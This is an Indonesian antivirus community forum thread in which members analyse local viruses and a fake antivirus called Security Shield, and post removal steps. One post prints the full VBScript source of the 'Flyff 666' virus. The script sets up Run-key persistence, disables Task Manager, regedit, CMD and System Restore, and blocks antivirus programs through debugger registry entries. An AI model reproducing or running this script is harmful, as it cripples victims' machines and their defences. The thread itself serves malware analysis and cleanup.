=>Disetiap Drive akan ada virus ini dan juga di C:\WINDOWS.
=>Dan sepertinya akan memblok beberapa AV,seperti Ansav,PCMAV dan NOD32.
=>Akan mendisable klik Kanan pada mouse.

Bersyukurlah klo anda pengguna Smadav,karena sejau ini Smadav blom masuk dalam kategori si empunya Virus.... :)

Cara mengatasinya :
->Masuk ke Safe mode:
->Buka Smadav dan lakukan scanning.Samapi disini smadav akan menemukan beberapa registry yang rusak/tidak sesuai langsung aja repair semuanya dan nama virus ini akan kedetect sm smadav,Tp cuman autorun.inf aja yg mampu diclean Smadav.Virus induknya takan masuk ke quarantine.Di quarantine Silahkan delete semuanya.Trus masuk  ke Smadav >> Tools >> System Editor,select all dan apply.sekarang restart komputernya.
->Masuk C:\WINDOWS cari nama virus ini,dan silahkan delete terlebih dahulu.

Di startup masih ada pesan si empunya virus.....hapus di regedit.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LegalNoticeCaption", "H4x0r3d By Flyff 666"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LegalNoticeText", "Saya Adalah Program Jahat yang Akan Mengambil Alih Komputer kalian !! System Hasbeen Hacked BY : Flyff 666 From Indonesian Hackers Community"
Delete LegalNoticecaption dan LegalNoticeText.

dan cari lagi di regedit.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption", "Flyff 666 VM_Community"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText", "Saya Adalah Program Jahat yang Mengambil Alih Komputer kalian !! dibuat Oleh Flyff 666"
Delete LegalNoticecaption dan LegalNoticeText

restart komputer.Silahkan Scan ulang dengan Smadav.Sampai disitu virus sudah tak berkutik........ :D




Ane minta Sample Virusnya dong
upload d sini :
Disini (http://smadaver.com/konsultasi-virus/upload-virus-ke-forum/770/)

ok gan .. maaf kalo ada kata2 yang salah ! mohon d maklumi  ^:)^ ^:)^ ^:)^
Judul: Re: Bedah Virus Disini !
Ditulis oleh: jatioke pada Agustus 02, 2011, 07:42:32 AM
ini source code virusFlyff888.dll.vbs
--------------------------------------------------------------------------------------
'FLyff 666.dll.vbs

set rg = createobject("WScript.Shell")
rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\Run\User",winpath&"\Flyff 666.dll.vbs"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title","Hacked by Flyff 666"
rg.regwrite "HKCR\vbsfile\DefaultIcon","shell32.dll,2"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SuperHidden", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop\NoChangingWallpaper", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\CleanShutdown", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\FaultTime", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoCDBurning", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoTrayContextMenu", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWinKeys", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoTrayContextMenu", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Shutdown_Settings", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\System", "1", "REG_DWORD"
rg.Regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives", "67108863", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableCMD", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\NoScrSavPage", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\NoDispCpl", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Program Manager\Restrictions\NoClose", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Program Manager\Restrictions\NoFileMenu", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Program Manager\Restrictions\NoRun", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System\DisableCMD", "1", "REG_DWORD"
rg.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff", "1", "REG_DWORD"
rg.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel", "1", "REG_DWORD"
rg.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", "1", "REG_DWORD"
rg.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", "1", "REG_DWORD"
rg.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", "1", "REG_DWORD"
rg.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System Monitoring", "1", "REG_DWORD"
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption", "Flyff 666 VM_Community"
rg.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText", "Saya Adalah Program Jahat yang Mengambil Alih Komputer kalian !! dibuat Oleh Flyff 666"
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe\Debugger",""
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe\Debugger",""
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger",""
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger",""
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe\Debugger",""
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegistryEditor.exe\Debugger",""
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe\Debugger",""
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avscan.exe\Debugger",""
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avcenter.exe\Debugger",""
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ashAvast.exe\Debugger",""
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ansav.exe\Debugger",""
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\viremoval.exe\Debugger",""
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\viremover.exe\Debugger",""
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-CLN.exe\Debugger",""
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nod32.exe\Debugger",""
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nod32kui.exe\Debugger",""
rg.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LegalNoticeCaption", "H4x0r3d By Flyff 666"
rg.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LegalNoticeText", "Saya Adalah Program Jahat yang Akan Mengambil Alih Komputer kalian !! System Hasbeen Hacked BY : Flyff 666 From Indonesian Hackers Community"
rg.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer\LimitSystemRestoreCheckpointing", "1", "REG_DWORD"
rg.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer\DisableMSI", "1", "REG_DWORD"
rg.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore\DisableSR", "1", "REG_DWORD"
rg.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore\DisableConfig", "1", "REG_DWORD"
Judul: Re: Bedah Virus Disini !
Ditulis oleh: sondetau pada Agustus 10, 2011, 09:53:05 PM
nice info nih...
buat blajar..
hehe
 :-bd :-bd :-bd
Judul: Re: Bedah Virus Disini !
Ditulis oleh: klasnich pada Agustus 11, 2011, 11:43:32 AM
file-nya tidak ada bro, cuma ada desktop.ini...  ???

sepertinya sudah di hapus sama antivirus ya...  :D
Judul: Re: Bedah Virus Disini !
Ditulis oleh: mapix pada Agustus 25, 2011, 02:37:20 PM
eemm salam kenal all....q mau tanya nh ma temen2 knp sh ko banyak bgt org yang bisa bikin virus bahkan d toko2 buku pun bannyak bgt di jual buku2 cara bikin virus, apa sih keuntungannya bikin virus minta kejelasannya....thanks
banyak tujuan yg diinginkan orang dalam membuat virus, misalnya untuk curhat, melampiaskan kemarahan, patah hati ;D, mencuri data orang utk mencari materi >:(, sekedar pamer/narsis =)), atau yang tega ingin merusak PC orang dan lebih mengenaskan apabila ada orang membuat virus agar antivirus buatannya cepat laku karena hanya dia yg sanggup mendeteksi dan menyembuhkan dari serangan virus tersebut. ~x(

Tidak semua seperti yang anda duga bro, jika Anda mau tahu bahwa dalam 1 bulan ada sekitar 75 ribu virus yang dibuat oleh para pembuat virus, sedangkan antivirus yang beredar hanya sekitar 20 s/d 30 saja. Lalu bagaimana bisa antivirus buatan (orang pembuat virus) dapat bersaing jika antivirus yang lain justru sedang giat mengejar puluhan definisi virus yang telah disebarkan oleh berbagai macam kumpulan orang yg tidak bertanggung jawab. Bukan jaman-nya lagi orang iseng buat virus, karena virus yang Anda buat belum tentu bereaksi dan direspon positif oleh orang, karena ternyata pembuat virus alsi diluar sana lebih jago dari Anda (yg hanya memikirkan keuntungan pribadi).

PISS
saya cuma pernah membaca komen pada sebuah buku tentang membuat virus, gini katanya "saya akan membuat super virus,dimana cuma saya yg tau cara mengatasinya dan saya akan menjualnya, sehingga cuma av saya saja yg laku" apakah ini benar adanya?? hehehe saya kan cuma menjawab pertanyaan orang, kok dibawa serius ya.....
Judul: Re: Bedah Virus Disini !
Ditulis oleh: Deny MiniDwarf pada Agustus 26, 2011, 04:23:43 PM
eemm salam kenal all....q mau tanya nh ma temen2 knp sh ko banyak bgt org yang bisa bikin virus bahkan d toko2 buku pun bannyak bgt di jual buku2 cara bikin virus, apa sih keuntungannya bikin virus minta kejelasannya....thanks
banyak tujuan yg diinginkan orang dalam membuat virus, misalnya untuk curhat, melampiaskan kemarahan, patah hati ;D, mencuri data orang utk mencari materi >:(, sekedar pamer/narsis =)), atau yang tega ingin merusak PC orang dan lebih mengenaskan apabila ada orang membuat virus agar antivirus buatannya cepat laku karena hanya dia yg sanggup mendeteksi dan menyembuhkan dari serangan virus tersebut. ~x(

Tidak semua seperti yang anda duga bro, jika Anda mau tahu bahwa dalam 1 bulan ada sekitar 75 ribu virus yang dibuat oleh para pembuat virus, sedangkan antivirus yang beredar hanya sekitar 20 s/d 30 saja. Lalu bagaimana bisa antivirus buatan (orang pembuat virus) dapat bersaing jika antivirus yang lain justru sedang giat mengejar puluhan definisi virus yang telah disebarkan oleh berbagai macam kumpulan orang yg tidak bertanggung jawab. Bukan jaman-nya lagi orang iseng buat virus, karena virus yang Anda buat belum tentu bereaksi dan direspon positif oleh orang, karena ternyata pembuat virus alsi diluar sana lebih jago dari Anda (yg hanya memikirkan keuntungan pribadi).

PISS
saya cuma pernah membaca komen pada sebuah buku tentang membuat virus, gini katanya "saya akan membuat super virus,dimana cuma saya yg tau cara mengatasinya dan saya akan menjualnya, sehingga cuma av saya saja yg laku" apakah ini benar adanya?? hehehe saya kan cuma menjawab pertanyaan orang, kok dibawa serius ya.....
untuk hal yang satu ini dwarf juga pernah baca di majalah PC Media..selain yang disebutin oleh agan..av maker juga membuat virus untuk meningkatkan omzet penjualan av nya dan meningkatkan margin perusahaan av tersebut..
Sorry but you are not allowed to view spoiler contents.
Judul: Re: Bedah Virus Disini !
Ditulis oleh: abibundafaiz pada Agustus 28, 2011, 09:29:01 PM
Bagaimana Cara HAPUS Sepertinya VIRUS " COPY SHORCUT 1-4 " PLEASE....., juga FOLDER REYCLER, TOLONG Ya....???
Judul: Re: Bedah Virus Disini !
Ditulis oleh: Desperados pada September 22, 2011, 02:44:20 PM
q jadi pngen coding lagi
Judul: Re: Bedah Virus Disini !
Ditulis oleh: tediputra pada September 29, 2011, 12:42:49 PM
bagaimana dg ini: bbrp hr yg lalu sy coba menghapus virus shortcut hasil colokan dari flashdis temen. saya hapus dengan script yg sy dapat dari internet, tapi hasilnya malah command prompt dan semua program yg terinstal jadi tidak bisa berjalan. mohon bantuannya. Tedi
Judul: Re: Bedah Virus Disini !
Ditulis oleh: :Pak:Bos: pada Oktober 02, 2011, 09:35:44 PM
hati2 dengan script di internet... kadang itu malah script virus.
coba scan pake smadav biar direpair registrynya...
Judul: Re: Bedah Virus Disini !
Ditulis oleh: Arachmadi pada Oktober 03, 2011, 10:49:49 AM
asik nohh.. bolah juga !,, seru nih virus :D
Judul: Re: Bedah Virus Disini !
Ditulis oleh: alfatta pada Oktober 06, 2011, 04:18:29 AM
kk aq udah pake smadav yang terbaru tuh yg 8.7 tapi kan komputer ku ada virus disable regedit sama task manager, awalnya sih bisa tuh dari scan registry tapi selese scan langsung kedisable lagi. dan komputer saya aneh ga bisa dipasang antivirus lain slain smadav. dan koneksi internet saya juga kayaknya keserang deh. pliis bantu y kak bgaimana solusinya. Sad Sad
 Smiley Smiley
Remove message
Judul: Re: Bedah Virus Disini !
Ditulis oleh: RyanBrilianto pada November 17, 2011, 08:10:08 PM
om jastis , virus semacam ini udah di tangan SMADAV ? maksud saya , sudah terkendali ?
Judul: Re: Bedah Virus Disini !
Ditulis oleh: KlinikQu pada November 23, 2011, 02:19:47 PM
Bagaimana Cara HAPUS Sepertinya VIRUS " COPY SHORCUT 1-4 " PLEASE....., juga FOLDER REYCLER, TOLONG Ya....???

Ramnit gan, coba cek disini :

http://www.vaksin.com/2011/0811/clean%20htm%20html%20from%20Ramnit/Clean%20htm%20html%20from%20Ramnit%20injection.html
Judul: Re: Bedah Virus Disini !
Ditulis oleh: KlinikQu pada November 23, 2011, 02:22:44 PM
eemm salam kenal all....q mau tanya nh ma temen2 knp sh ko banyak bgt org yang bisa bikin virus bahkan d toko2 buku pun bannyak bgt di jual buku2 cara bikin virus, apa sih keuntungannya bikin virus minta kejelasannya....thanks
banyak tujuan yg diinginkan orang dalam membuat virus, misalnya untuk curhat, melampiaskan kemarahan, patah hati ;D, mencuri data orang utk mencari materi >:(, sekedar pamer/narsis =)), atau yang tega ingin merusak PC orang dan lebih mengenaskan apabila ada orang membuat virus agar antivirus buatannya cepat laku karena hanya dia yg sanggup mendeteksi dan menyembuhkan dari serangan virus tersebut. ~x(

Tidak semua seperti yang anda duga bro, jika Anda mau tahu bahwa dalam 1 bulan ada sekitar 75 ribu virus yang dibuat oleh para pembuat virus, sedangkan antivirus yang beredar hanya sekitar 20 s/d 30 saja. Lalu bagaimana bisa antivirus buatan (orang pembuat virus) dapat bersaing jika antivirus yang lain justru sedang giat mengejar puluhan definisi virus yang telah disebarkan oleh berbagai macam kumpulan orang yg tidak bertanggung jawab. Bukan jaman-nya lagi orang iseng buat virus, karena virus yang Anda buat belum tentu bereaksi dan direspon positif oleh orang, karena ternyata pembuat virus alsi diluar sana lebih jago dari Anda (yg hanya memikirkan keuntungan pribadi).

PISS
saya cuma pernah membaca komen pada sebuah buku tentang membuat virus, gini katanya "saya akan membuat super virus,dimana cuma saya yg tau cara mengatasinya dan saya akan menjualnya, sehingga cuma av saya saja yg laku" apakah ini benar adanya?? hehehe saya kan cuma menjawab pertanyaan orang, kok dibawa serius ya.....
untuk hal yang satu ini dwarf juga pernah baca di majalah PC Media..selain yang disebutin oleh agan..av maker juga membuat virus untuk meningkatkan omzet penjualan av nya dan meningkatkan margin perusahaan av tersebut..
Sorry but you are not allowed to view spoiler contents.

klo yg itu lain ceritanya gan... coba deh cari sejarah si pembuat majalah (bos) itu...
Judul: Re: Bedah Virus Disini !
Ditulis oleh: AdhiePanji pada November 28, 2011, 09:53:20 PM
mau tanya neh gan..
Kalo penyebaran virus sality dengan apa ?
(newbie)
Judul: Re: Bedah Virus Disini !
Ditulis oleh: Deny MiniDwarf pada November 30, 2011, 04:08:17 PM
Up;
Coba masuk ke sini, semua tentang sality ada disana
http://smadaver.com/konsultasi-virus/sality-kuku/
Judul: Re: Bedah Virus Disini !
Ditulis oleh: AdhiePanji pada Desember 02, 2011, 02:42:13 PM
Thanks gan :)
Judul: Security Shield (Fake Anti Virus)
Ditulis oleh: Ki@mhu pada Januari 04, 2012, 05:51:47 PM
Sebelumnya ane minta izin dulu dari Admin, Momod, dan TOS untuk mereview virus ini.. Ane mencoba review karena ane mempertimbangkan banyaknya virus yang diupload di sini terutama oleh agan Ponco Wibowo (http://smadaver.com/profile/ponco%20wiibowo/). Terima kasih kepadanya karena telah banyak mengupload virus..  :-bd

Sebelumnya, mohon maaf jika ada review saya yang salah dan kurang.. Saya sangat berharap ada kritik dari rekan-rekan di sini agar hasil review menjadi lebih jelas..  :)

Anti Virus palsu ini sama (Security Shield) seperti Anti Virus palsu sejenisnya yang menakut-nakuti korban dengan sejumlah deteksi virus dan peringatan yang tiada hentinya. Tampilannya sangat meyakinkan korbannya sehingga akan memancing korban untuk membeli serial key-nya.

Tipe file: Aplikasi (exe)
Jumlah Sampel: 2
Size: 357 kB, 323 kB
Sampel dari: Ponco Wibowo (Smadaver)
MD5: EA77763BDC21F76166A056BD6360DF26, D254AD03D36394C922028E34D4194484
CRC32: 104ACB68, 4B056DD4

Tampilan:
Sorry but you are not allowed to view spoiler contents.

Sewaktu pertama kali dijalankan, file ini akan membuat Induknya di C:\Documents and Settings\[USER]\Local Settings\Application Data yang bernama acak dan berlogo sama dengan file pertama tadi dengan Signature MD5 dan CRC32 yang sama juga:

(http://i41.servimg.com/u/f41/17/11/92/75/new_pi33.jpg)

(http://i41.servimg.com/u/f41/17/11/92/75/new_pi32.jpg)
Gambar 2

Kemudian file pertama yang dijalankan tadi akan dihapus untuk menghilangkan jejak dan akan munculkan pesan berikut ini tanpa ada tampilan proses instalasi:

(http://4.bp.blogspot.com/-0xMxOCs8ZVo/Tv9vSdzPeZI/AAAAAAAAAFo/8P-VxvE5EPw/s1600/New+Picture+%25285%2529.bmp)

Setelah korban mengklik tombol OK, maka Induk Security Shield mulai berjalan dan akan muncul tampilan yang mulai melakukan scan pura-pura terhadap komputer korban. Proses scan ini tidak bisa dihentikan maupun di-minimize (lihat gambar 1 di atas).
Setelah selesai melakukan scan tipu menipu, maka dia akan menampilkan Summary dari virus-virus yang dideteksinya pada komputer korban:

Sorry but you are not allowed to view spoiler contents.

Apabila korban menekan Tombol Remove, maka korban akan diantarkan pada Website untuk membeli serial key dari Security Shield ini yang tentunya merupakan sebuah penipuan yang ingin mencuri informasi yang dimasukkan sewaktu ingin membeli serial key-nya.
Untuk lebih meyakinkan korbannya bahwa komputernya sedang terinfeksi virus-virus yang dideteksinya, maka sesekali akan muncul pesan dari Tray Icon Taskbar Fake AV ini:

(http://i41.servimg.com/u/f41/17/11/92/75/1new_p10.jpg)

(http://i41.servimg.com/u/f41/17/11/92/75/new_pi28.jpg)

(http://i41.servimg.com/u/f41/17/11/92/75/new_pi29.jpg)

Apabila korban menyimpan Report hasil scan dengan menekan Tombol Save Report pada gambar 1 di atas, maka akan tersimpan Report palsu dalam bentu notepad yang isinya adalah:

Sorry but you are not allowed to view spoiler contents.

Sebagai pertahanan,  Security Shield akan menghalangi setiap proses aplikasi yang akan dijalankan dengan menampilkan pesan berikut: (dalam hal ini saya mencoba menjalankan Smadav)

(http://3.bp.blogspot.com/-2gjOo7n2iRM/Tv93M8b5leI/AAAAAAAAAGc/Miwkmw0Ldq0/s1600/Copy+of+New+Picture+%25282%2529.bmp)

Bukan aplikasi dari luar saja yang dihalangi, tetapi aplikasi dari dalam sistem Windows juga dihalanginya seperti Task Manager, Regedit, dll. Ini membuat proses Fake AV ini tidak bisa di-Terminate melalui Task Manager ataupun aplikasi sejenisnya. Termasuk juga Rundll32.exe juga dihalanginya sehingga komputer korban tidak bisa menampilkan pesan Safely Remove Harware pada Drive USB.

Fake AV ini juga menampilkan jendela yang sangat mirip dengan Windows Security Center Alerts:

Sorry but you are not allowed to view spoiler contents.

Coba perhatikan gambar tadi dengan seksama, Automatic Updates dan Firewall yang ditunjukkannya akan tetap pada status On walaupun sebenarnya dalam status Off. Jendela ini juga tidak bisa ditutup oleh korban.

Security Shield juga akan menampilkan Balloon pada Taskbar seperti yang dilakukan oleh wscntfy.exe (salah satu proses windows):

(http://i41.servimg.com/u/f41/17/11/92/75/new_pi26.jpg)

Yang mana pada Balloon asli sebelah kiri (yang ditampilkan wscntfy.exe), akan keluar Tulisan Windows Security Alerts ketika pointer Mouse berada dekat dengannya. Tetapi tidak demikian pada Balloon sebelah kanan yang dimunculkan Fake AV ini.
Dari Balloon palsu inilah kemudian akan muncul pesan peringatan untuk meluluhkan hati korban yang sudah mulai ragu-ragu:

(http://i41.servimg.com/u/f41/17/11/92/75/n1ew_p10.jpg)

Sebagai "bonus", Security Shield juga menyediakan berbagai bahasa:

Sorry but you are not allowed to view spoiler contents.

Pembersihan:
Security Shield akan aktif setiap user melakukan Log on Windows walaupun tidak merubah Registry pemicu otomatis seperti pada kebanyakan virus lainnya. Tetapi dia tidak aktif sewaktu boot pada safe mode maka pembersihannya cukup melakukan booting pada safe mode dan hapus file induk bernama acak (exe) pada C:\Documents and Settings\[USER]\Local Settings\Application Data yang bericon sama seperti pada gambar 2 di atas. Karena Security Shield tidak mengacaukan Registry, maka sampai tahapan ini, proses penghapusan telah selesai.
Restart kembali dan boot pada mode normal untuk memastikan Fake AV Security Shield ini telah hilang.

^_^ Semoga Berhasil  ^_^
Judul: Re: Bedah Virus Disini !
Ditulis oleh: RifqiSah pada Januari 04, 2012, 06:36:00 PM
Galak bener tuh virus ya  :-\ :-\
Judul: Re: Bedah Virus Disini !
Ditulis oleh: Ki@mhu pada Januari 04, 2012, 06:40:42 PM
Galak bener tuh firus ya  :-\ :-\
Untung safe mode tidak ikut diblok gann.. Karena hanya melalui safe modelah cara termudah membersihkannya.. :)
Judul: Re: Bedah Virus Disini !
Ditulis oleh: RifqiSah pada Januari 04, 2012, 07:05:42 PM
Galak bener tuh firus ya  :-\ :-\
Untung safe mode tidak ikut diblok gann.. Karena hanya melalui safe modelah cara termudah membersihkannya.. :)

Kalau safe mode diblok, gimana jadinya ya ? ???
Judul: Re: Bedah Virus Disini !
Ditulis oleh: Ki@mhu pada Januari 04, 2012, 07:16:13 PM
Galak bener tuh firus ya  :-\ :-\
Untung safe mode tidak ikut diblok gann.. Karena hanya melalui safe modelah cara termudah membersihkannya.. :)

Kalau safe mode diblok, gimana jadinya ya ? ???
Ini yang agak susah gann.. Tapi masih bisa ditanggulangi dengan windows live cd.. Booting dengan windows live cd tersebut dan hapus file induknya di sini:
C:\Documents and Settings\[USER]\Local Settings\Application Data
Dan booting kembali dari mode normal.. Selesai..  :)
Judul: Re: Bedah Virus Disini !
Ditulis oleh: fernando23 pada Januari 05, 2012, 01:40:03 AM
bro ada yg tau nanggulangi cybergate= server. exe (excutable files)m,,,,amat terbantu jika ada yg punya pglmn or knowledge utk nyang satu ini, thenk yu
Judul: Re: Bedah Virus Disini !
Ditulis oleh: Ki@mhu pada Januari 05, 2012, 11:45:48 AM
bro ada yg tau nanggulangi cybergate= server. exe (excutable files)m,,,,amat terbantu jika ada yg punya pglmn or knowledge utk nyang satu ini, thenk yu
Masih ada sampelnya gan? Kalo ada, upload saja ke:
http://smadaver.com/konsultasi-virus/upload-virus-ke-forum

Biar dibantu rekan-rekan yang sempat melakukan analisis..
Judul: Re: Bedah Virus Disini !
Ditulis oleh: ponco wiibowo pada Januari 05, 2012, 11:55:58 AM
@ki@mhu: mantap gan analisanya  :-bd :-bd +1 buat agan ya gan. semoga bisa dimasukin ke database smadav selanjutnya ya  <=)
senang rasanya bisa berkontribusi untuk smadav  :-bd
Judul: Re: Bedah Virus Disini !
Ditulis oleh: Ki@mhu pada Januari 05, 2012, 12:04:56 PM
@ki@mhu: mantap gan analisanya  :-bd :-bd +1 buat agan ya gan. semoga bisa dimasukin ke database smadav selanjutnya ya  <=)
senang rasanya bisa berkontribusi untuk smadav  :-bd
Trims gann..  :)
Mohon dikoreksi yahh kalo ada yang salah dan kurang..  ^:)^
Iyaa.. Mari berkontribusi teruss gann.. :-bd
Judul: Re: Bedah Virus Disini !
Ditulis oleh: dniell pada Januari 05, 2012, 01:58:30 PM
ayo setelah kita bedah mari kita goreng saja itu virus
Judul: Re: Bedah Virus Disini !
Ditulis oleh: Xevenz pada Januari 05, 2012, 06:54:16 PM
mo nanya...
saya can di avira ada virus yg namanya W32/Slugin.A
tp di smadav knp gak ke detek ya?

trus itu virus apa?
Judul: Re: Bedah Virus Disini !
Ditulis oleh: RefrizaL pada Januari 06, 2012, 12:47:16 PM
Baca infonya di sini gan...http://goblognyaguru.blogspot.com/2011/07/membasmi-virus-win32slugina.html
trus virus luar kyknya..

itulah mengapa kita perlu mengkolaborasi smadAV dengan AV impor..
smadAV memfokuskan pembasmian virus lokal dan sebagian virus impor yg beredar di Indonesia..
Judul: Re: Bedah Virus Disini !
Ditulis oleh: geraldyjonathan pada Januari 07, 2012, 11:56:03 PM
virus2 lain bisa kehapus juga gak pake cara itu gan? termasuk sality
Judul: Virus Tiger Penginfeksi File Asp, Aspx, Exe, Htm, Html, dan Rar
Ditulis oleh: Ki@mhu pada Januari 11, 2012, 09:53:09 PM
Akhirnya postingan ini selesai juga setelah sekian lama ane bergadang.. :P
Baru-baru ini Smadav mendapat sampel virus ini dari rekan ARRe di sini (http://smadaver.com/konsultasi-virus/upload-virus-ke-forum/1030/) (sebenarnya sudah lama juga ;D) yang berarti virus ini sudah mulai menyebar di Indonesia.

